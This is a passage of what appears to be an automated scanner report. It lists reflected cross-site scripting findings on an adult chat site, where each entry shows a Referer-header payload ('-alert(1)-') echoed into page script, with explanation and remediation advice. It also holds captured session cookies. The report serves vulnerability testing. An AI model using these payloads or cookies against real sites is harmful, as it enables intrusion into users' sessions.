http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:25 GMT Connection: close Content-Length: 25009 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bd48'-alert(1)-'6c03af217a6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/nude-chat/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=3bd48'-alert(1)-'6c03af217a6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:40 GMT Connection: close Content-Length: 23212 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... avascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/keyholesexplanation.aspx&he=imlive.com&ul=/live-sex-chats/nude-chat/&rf=http://www.google.com/search?hl=en^q=3bd48'-alert(1)-'6c03af217a6&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2f14'-alert(1)-'1a0426053d6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/orgies/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=e2f14'-alert(1)-'1a0426053d6
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:37 GMT Connection: close Content-Length: 49057 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/orgies/&rf=http://www.google.com/search?hl=en^q=e2f14'-alert(1)-'1a0426053d6&qs=cat=1^roomid=14&qs=cat=1^roomid=14&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ae9'-alert(1)-'abc512c790d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/pornstars/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=58ae9'-alert(1)-'abc512c790d
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 265847 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/pornstars/&rf=http://www.google.com/search?hl=en^q=58ae9'-alert(1)-'abc512c790d&qs=cat=1^roomid=249&qs=cat=1^roomid=249&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 43a6f'-alert(1)-'e56dafa5755 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/role-play/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=43a6f'-alert(1)-'e56dafa5755
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:22:56 GMT Connection: close Content-Length: 53309 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/role-play/&rf=http://www.google.com/search?hl=en^q=43a6f'-alert(1)-'e56dafa5755&qs=cat=1^roomid=-999&qs=cat=1^roomid=-999&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98cde'-alert(1)-'7896e5dc643 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-galleries/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=98cde'-alert(1)-'7896e5dc643
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:26 GMT Connection: close Content-Length: 29317 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... t/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/content.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-galleries/&rf=http://www.google.com/search?hl=en^q=98cde'-alert(1)-'7896e5dc643&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ec165'-alert(1)-'39542b02b36 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-photos/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ec165'-alert(1)-'39542b02b36
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:34 GMT Connection: close Content-Length: 25154 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/snapshotgallery.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-photos/&rf=http://www.google.com/search?hl=en^q=ec165'-alert(1)-'39542b02b36&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd985'-alert(1)-'f1142f5eb83 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/sex-show-sessions/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=bd985'-alert(1)-'f1142f5eb83
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:47 GMT Connection: close Content-Length: 25492 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/recordedlivesessions.aspx&he=imlive.com&ul=/live-sex-chats/sex-show-sessions/&rf=http://www.google.com/search?hl=en^q=bd985'-alert(1)-'f1142f5eb83&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b2392'-alert(1)-'0c423d5641 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
